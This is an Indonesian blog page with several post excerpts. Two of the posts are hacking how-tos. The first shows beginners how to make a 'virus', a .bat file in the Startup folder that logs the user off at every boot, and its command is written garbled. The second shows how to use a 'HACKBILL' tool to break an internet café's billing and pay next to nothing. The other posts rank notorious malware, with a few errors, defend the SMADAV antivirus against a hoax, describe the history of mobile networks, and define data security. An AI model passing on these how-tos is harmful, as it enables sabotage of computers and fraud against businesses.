}

Minggu, 30 Oktober 2011

cara membuat viruz bagi pemula

hahaha
langsung ajjh dh..

-pertama, buka notepad (klo nda tw cra'a nih guu ksh tw..
klik star, all programs, accesoris, cri tulisan notepad)
-kedua, isi notepad dengan "star%windir%/starup/logoff.exe"(ga make tanda kutip)
-ketiga, save file'a di c:/dokumens and sittings/all user/programs/starup
nama'a bebas..extensinya bat contoh: minato.bat
klo udah.. close smua program lalu restar kompi kamu..
jreng..jreng..jreng.. abis d.restar kompi kamu gga bkal nyalah..
coz tdi udah dikasih perintah buat ngelogoff..
udh y..

SAYA TIDAK BERTANGGUNG JAWAB ATAS KERUSAKAN KOMPUTER ANDA
TERIMA KASIH
Baca selanjutnya- cara membuat viruz bagi pemula

viruz terkejam didunia

Pada kesempatan kali ini akan memberikan daftar per

ingkat virus terkejam di dunia,

Berikut daftar virus-virus tersebut. Ih.... Ngeri......





Peringkat 1. Storm Worm,

Muncul pada tahun 2006, disebut “Storm Worm” karena nyebar via email dengan judul “230 dead as storm batters Europe”. Storm worm adalah program Trojan house. beberapa versinya bisa buat komputer menjadi bots. Atau biasa digunakan hacker untuk spam mail melalui internet.



Peringkat 2. Leap-A/Oompa- A,

Mac yang punya konsep security through obscurity yakin tidak akan terserang virus karena OS nya sistem tertutup. Tapi tahun 2006, virus Leap-A atau biasa disebut Oompa-A muncul. Nyebar lewat iChat pada Mac. Setelah Mac terserang, virus itu akan mencari kontak melalui iChat dan kirim pesan ke tiap kontak itu. Pesannya itu berisi file corrupt yang berbentuk JPEG. Memang tidak berbahaya, namun hal ini menyatakan bahwa masih mungkin akan ada virus berbahaya yang menyerang MAC.





Peringkat 3. Sasser and Netsky,

Penciptanya anak Jerman umur 17 tahun, Sven Jaschan. Sasser nyerang Microsoft Windows. Sasser ini ga nyebar via email. Tapi jika satu komputer koneksi ke komputer yang kena virus ini. Virus ini bikin komputer tidak bisa di-shutdown tanpa cabut power. Netsky nyebar melalui email dengan 22 Kb attachment file dan jaringan Windows. Bisa bikin serangan DoS. Sven Jaschan tidak dipenjara hanya diberi masa percobaan 1 taon 9 bulan, karena umurnya masih di bawah 18 tahun





Peringkat 4. MyDome (Novarg),

Mulai nyerang tanggal 1 Februari 2004, virus ini buat backdoor di OS. Pertama kali tanggal 1 itu mulai DDoS. Kedua, tanggal 12 Feb, virus ini berhenti menyebar dan mulai buat backdoors. MyDoom menyebar via email, selain itu selalu search di search engines, seperti Google mulai menerima jutaan permintaan pencarian dan bikin lambat sampai akhirnya crash. Gara2 MyDoom, Senator US Chuck Schumer mengajukan pembuatan National Virus Response Center.
Baca selanjutnya- viruz terkejam didunia

Sedikit info tentang berita HOAX smadav

Saat ini banyak sekali info2 yang
menyatakan bahwa anti virus SMADAV
merusak hard disk maupun komentar
yang buruk akan anti virus SMADAV..
Saya pun secara langsung mencari
kebenaran info tersebut (hehe.. ) Dan saya menemukan penjelasan
yang rasional akan hal tersebut..
akan tetapi sebelumnya, apabila anda
tidak percaya dengan penjelasan
tersebut itu adalah hak anda, disini
saya hanya membuktikan berdasarkan fakta2 yang ada..
(hehe.. peace bro.. :D)
ini penjelasan dari salah satu dari tim
developer SMADAV anti virus.. "Berikut ini fakta-fakta yang ada yang
jelas-jelas berlawanan dengan
pernyataan salah diatas :
1.
Smadav adalah software yang tidak
pernah mengakses hardware secara langsung, Smadav selalu
memerintahkan OS (Windows) untuk
suatu instruksi dan OS tersebut yang
akan berinteraksi langsung dengan
hardware. Fungsi Smadav saat
membaca file hanya menggunakan Fungsi API CreateFileW & ReadFile
yang di-import dari Kernel32.dll, itu
artinya proses pembacaan file secara
langsung di harddisk dilakukan oleh
Windows dan kemudian hasil
pembacaannya di-export ke fungsi milik Smadav. Jadi, kalaupun ada satu
kasus dimana suatu hardware (dalam
kasus ini harddisk) rusak sesaat
setelah di-scan oleh Smadav, berarti
itu kemungkinan besar memang
hardware tersebut rusak karena faktor-faktor tertentu yang terjadi
pada fisik hardware-nya atau
(kemungkinan kecil) ada sesuatu
yang salah pada fungsi pembacaan
file oleh Windows sendiri. 2.
Saya kurang percaya bahwa Microsoft
menyempatkan waktu untuk
mengetes Smadav dan mem-publish
hasilnya, kemungkinan besar itu tidak
benar. Jika fungsi CreateFileW & ReadFile yang digunakan Smadav
merusak harddisk itu artinya Windows
Explorer dan sebagian besar program
Built-In di Windows juga merusak
harddisk (???). Ini karena Windows
Explorer juga menggunakan fungsi yang sama dengan Smadav untuk
mengakses hardware (secara tidak
langsung). Tapi jelas bahwa ini tidak
benar. Jadi, kesimpulannya Smadav
tidak mungkin merusak harddisk dan
pernyataan diatas adalah HOAX. 3.
Jika Anda masih tidak percaya dengan
pembuktian dan fakta yang saya
jelaskan diatas, Anda dapat meng-
uninstall Smadav dari PC Anda. Kami
tidak ingin membebani pengguna :)" Kemudian ini juga tanggapan satu
lagi dari developer SMADAV "@anyone:SMADAV Bisa Bikin Hardisk
BAD waaahh ini adalah hal yg terlalu
mengada-ada bahkan bisa di bilang
terlalu berlebihan... >:( >:( sudah ada tanggapan dari mas Zai
sebagai developer smadav yg
menjelaskan bahwa smadav tidak
merusak hardware termasuk
harddisk.. nah bagi para smadaver coba kita
berfikir sejenak.... apa logis smadav yg
sudah begini luas penggunaan
mencoba melakukan dengan sengaja
untuk merusak hardware... :o :o :o walaupun saya tidak
mengesampingkan adanya bug pada
smadav... tapi adalah suatu hal yg
hampir mustahil kalo boleh di bilang
tidak mungkin smadav merusak
hardware... setahu saya program yg dibuat pake
vb belum/tidak mampu mengakses
hardware secara langsung (CMIIW).. saya juga tidak mengesampingkan
adanya rumor yg mengatakan
Smadav dapat merusak hardware spt
Harddisk dan Flashdisk... ada sebagian user yg mengatakan
Harddisk dan Flashdisk mereka rusak
ketika smadav terinstal di komputer
meraka.... sepertinya opini ini
terbentuk sebagai jalan untuk mencari
jawaban apa sebenarnya penyebabkan kerusakan hardware
tersebut... :-\ :-\ :-\
(disini saya tidak menjelaskan apa
salah satu peyebab hardware dapat
rusak, karena bukan pada tempatnya)
... alhasil sampailah user berkesimpulan
bahwa MUNGKIN Smadav yg merusak
hardware... kalo kita mau fair/adil, semua hal
patut di curigai sebagai biang keladi
penyebab kerusakkan hardware...
coba skali2 pake logika ini...jika ada
Harddisk dan Flashdisk rusak ato
korup.. coba perhatikan program apa yg
sedang berjalan...browser Firefox nah
berarti firefox itu penyebabnya...
ato kamu sedang mengetik pake Ms
Word..nah berarti Ms. word yg buat
rusak hardware... ato kamu lagi dengerin lagu pake
winamp.. tiba2 harddisk kamu korup..
nah berarti.. Winamp yg
menyebabkan hardisk korup...
ato cuma ngidupin Windows.. tiba
harddisk bad sector.... nah berarti windows yg bikin harddisk
badsector... bukan maksud untuk meyalahkan
program itu (Firefox. Ms Word,
Winamp, Window) sebagai penyebab
kerusakaan hardware, cuma kalo mau
fair/adil, kecurigaan terhadap smadav
yg meyebabkan hardware rusak juga dapat kita timpakan kepada
program2 lainnya juga yg terinstall
termasuk Windows sendiri..
itu semua belum termasuk alasan
teknik (usia, listrik mati, arus pendek,
kebanting, kesiram air).... saya disini tidak membenarkan/
menyalahkan siapa pun ... cuma
mengajak kamu2 untuk berfikir..
nah apa yg mau saya katakan disini...
ada banyak kemungkinan dan situasi
yg meyebabkan hardware rusak/ korup..
tetapi di masyarakt nampak sudah
terbentuk dulu pemikiran---memang
lebih mudah menyalahkan sesuat/
orang lain dibandingkan mencari/
introspeksi apa yg meyebabkan sesuatu hal itu bisa terjadi---
sepertinya ini merupakan tipikal
orang In*****ia --kapan dong kita
bisa majunya kalo pemikiran spt ini
gak dirubah.. :( :( oce sekian cuap-cuap gw.... yg tidak berkenan saya mohon maaf..
yg bosan silahkan lewat...
yg berfikir silahkan renungan..
yg pengen kasih cendol, saya tidak
nolak...
Baca selanjutnya- Sedikit info tentang berita HOAX smadav

Bikin eror biling warnet via HACKBILL

cekidot
1. Masuk warnet, maen personal aja ..
yg perlu di siapin cuma program HACKBILL.RAR
yg bisa di download di :DOWNLOAD
2. Stlah keluar menu cmd
ketik ipconfig -all
lalu enter
catat nomor ip deafult nya ..
3. Jalankan HACKBILL, pilih ALL CLIENT,
pada kolam host, isi dengan ip yg tdi di catat
lalu klik "connect"
nah, stlah terkonek, klik tulisan HACK NOW ..
Tunggu hingga proses slesai ..
Jika sudah, tutup program HACKBILL
lalu lanjutkan browsing / gaming lgi ..
Klo udh puas ..
Stop billing ..
Samperin oprator, tanya brp bayarnya ..
#klo explorer bisa Rp. 200 - Rp. 1500

^^ semoga bermanfaat
Baca selanjutnya- Bikin eror biling warnet via HACKBILL

Senin, 10 Oktober 2011

Pengembangan GPRS

1.Generasi 2,75G
Generasi 2,75G dikenal dengan generasi EDGE. EDGE diperkenalkan oleh AT&T di Amerika Serikat pada tahun 2003. Secara teknis sebetulnya EDGE telah memenuhi standar 3G yang ditetapkan oleh ITU. Teknologi ini dapat mengirimkan data lebih cepat dari 2.5G.


2.Generasi 3G
Teknologi 3G terbagi menjadi GSM dan CDMA. Teknologi 3G sering disebut dengan mobile broadband karena keunggulannya sebagai modem untuk internet yang dapat dibawa ke mana saja. Perkembangan teknologi 3G secara komersial dimulai pada Oktober, 2001, ketika NTTDoCoMo dari Jepang dengan teknologi W-CDMA menjual produknya untuk pertama kali secara terbatas. Kemudian disusul oleh SK Telecom, Korea Selatan pada tahun 2002 dengan teknologi 1xEV-DO, diikuti oleh KTF dari Korea Selatan dengan teknologi EV-DO. Keberhasilan layanan 3 G di kedua negara ini disebabkan oleh faktor dukungan pemerintah. Pemerintah Jepang tidak mengenakan biaya di muka (upfront fee) atas penggunaan lisensi spektrum 3G atas operator-operator di Jepang (ada tiga operator: NTT Docomo, KDDI dan Vodafone). Sedangkan pemerintah Korea Selatan, walau pun mengenakan biaya di muka, memberikan insentif dan bantuan dalam pengembangan nirkabel pita lebar (Korea Selatan adalah negara yang menggunakan Cisco Gigabit Switch Router terbanyak di dunia) sebagai bagian dalam strategi pengembangan infrastruktur.
Di Eropa, dipelopori oleh British Telecom dan Telenor dengan teknologi W-CDMA pada Desember 2001. Di Amerika Serika jaringan 3G dipelopori oleh Monet Mobile Networks dengan teknologi CDMA20001xEV-DO, diikuti oleh Verizon Wireless pada tahun 2003. Di Australia jaringan 3G komersial pertama kali diperkenalkan oleh Hutchinson Telecommunication dengan nama Three pada bulan maret 2003. Pada bulan Desember 2007 jaringan 3G telah dioperasikan di 40 negara dan 154 jaringan HSDPA telah beroperasi di 71 negara, dan 200 juta pelanggan telah terhubung melalui jaringan 3G.
Perkembangan teknologi 3G mengharuskan pengaturan spektrum secara global, melalui penyediaan pita (band) yang lebih luas. Adanya teknologi 3G sebagai hasil pengembangan teknologi generasi kedua, yaitu hasil perkembangan evolusioner, yang masih menggunakan perangkat jaringan 2G yang diperluas dan hasil perkembangan revolusioner yang memerlukan jaringan dan alokasi frekuensi yang sama sekali baru. Secara evolusioner, IMT-2000 telah menerapkan dua macam evolusi ke 3G, yakni dari 2G CDMA standard IS-95 (cdmaOne) ke IMT-SC (cdma2000) dan dari 2G TDMA standars (GSM/IS-136) ke IMT-SC (EDGE). Secara revolusioner, IMT-2000 membangun alokasi spektrum yang baru terkait tuntutan saluran yang makin luas.




Salah Paham Akan 3G


Ada beberapa pemahaman yang salah tentang 3G dalam masyarakat umum:
Layanan 3G tidak bisa tanpa ada cakupan layanan 3G dari operator. Hanya membeli sebuah handset 3G, tidak berarti bahwa layanan 3G dapat dinikmati. Handset dapat secara otomatis pindah ke jaringan 3G bila, pelanggan tidak menerima cakupan 3G. Sehingga bila seseorang sedang bergerak dan menggunakan layanan video call, kemudian terpaksa berpindah ke jaringan 2G, maka layanan video call akan putus.
Layanan 3G berada pada frekuensi 1.900 Mhz. ITU-T memang mendefinisikan layanan 3G untuk GSM pada frekuensi 1.900 Mhz dengan lebar pita sebesar 60 Mhz. Namun, pada umumnya, teknologi berbasis CDMA2000 menggunakan spektrum di frekuensi 800 Mhz, atau yang biasa dikenal sebagai spektrum PCS (Personal Communication System).
Kelebihan dan kekurangan 3G
Kelebihan: Perkembangan teknologi pita lebar bergerak menguntungkan baik untuk dunia bisnis, pemerintahan maupun perorangan, karena semakin baru teknologinya semakin besar data yang dapat dikirimkan dalam waktu yang lebih singkat. Jenis data yang dapat dikirimkan juga menjadi lebih beragam, tidak hanya huruf dan angka, tetapi juga gambar diam, gambar bergerak, dan suara.
Kekurangan: Disamping harganya lebih mahal, perlu diperhatikan aspek keamanannya dan aspek etika di dalam penggunaan teknologi yang baru. Peran ITU sangat penting di sini.Penyedia jasa layanan pita lebar bergerak harus membangun jaringan baru yang memerlukan investasi yang sangat besar.
Generasi 3,5G
Generasi 3,5G merupakan pengembangan dari 3G yang memungkinkan pengiriman data lebih cepat. Perbandingan antara 3G dan 3,5G terlihat jelas pada kecepatan transmisinya. Pada 3G, kecepatan transmisi maksimal 384kbps, sementara pada 3,5G kecepatan transmisi maksimal mencapai 3,6Mbps. Generasi 3G dan 3,5G mendukung layanan video call yang
Generasi 4G
Belakangan ini industri nirkabel mulai mengembangkan teknologi 4G, meskipun sebenarnya teknologi 4G ini seperti Long Term Evolution (LTE) hanya merupakan evolusi dari teknologi 3GPP dan Ultra Mobile Broadband (UMB) berasal dari 3GPP2, sehingga sulit untuk membedakan dengan jelas teknologi 3G dan 4 G. Salah satu teknolgoi 4G yaitu WiMax mobile standard telah diterima oleh ITU untuk ditambahkan pada IMT-2000, sehingga teknologi baru ini masih digolongkan ke dalam keluarga 3G. International Telecommunication Union (ITU) sedang mempelajari kemampuan mobile broadband yang disebut IMT-advanced yang disebut teknologi generasi keempat (4G). Diharapkan ITU segera melaksanakan penggunaan IMT-2000 (3G) dan IMT-Advanced (4G), konsekuensinya ITU harus menambah pita baik dibawah 1 GHz maupun diatas 2GHz.
Baca selanjutnya- Pengembangan GPRS

Keamanan Data

Keamanan data telah menjadi bagian dari pengembangan teknologi informasi mengingat bahwa berjuta-juta bit informasi telah dipertukarkan dalam jaringan komputer terutama di internet. Masalah keamanan data dapat diklassifikasi kedalam beberapa dimensi. Suatu situs komersial misalnya harus memenuhi persayaratan berikut ini.

* Secrecy: kategori kemanan komputer yang meliputi perlindungan data/informasi terhadap akses dari pihak-pihak yang tidak berhak serta masalah keaslian (autentik) dari sumber data/informasi. Masalah secrecy berkaitan dengan proses enkripsi-dekripsi serta proses autentikasi.
* Integrity: kategori keamanan data yang menjamin bahwa data tidak terganggu selama proses transfer dari sumber ke tujuan melalui saluran-saluran komunikasi. Masalah integrity berkaitan dengan bagaimana melindungi data dari penyusup yang berusaha masuk ke sumber data, atau menyusup dalam jaringan data, untuk mengubah dan merusak. Masalah virus yang bisa menghancurkan data juga menjadi bagian dari integrity.
* Availability: kategori keamanan data yang bisa mempertahankan sumber informasi agar selalu sedia dan aktif melayani para penggunanya. Masalah availability berkaitan dengan usaha melindungi server dari gangguan yang bisa menyebabkan server gagal memberi pelayanan (denial of service / DOS).
Baca selanjutnya- Keamanan Data
#newnavbar ul li{ list-style-type: none; display:inline; margin:0px; padding:30px; border:0px solid; }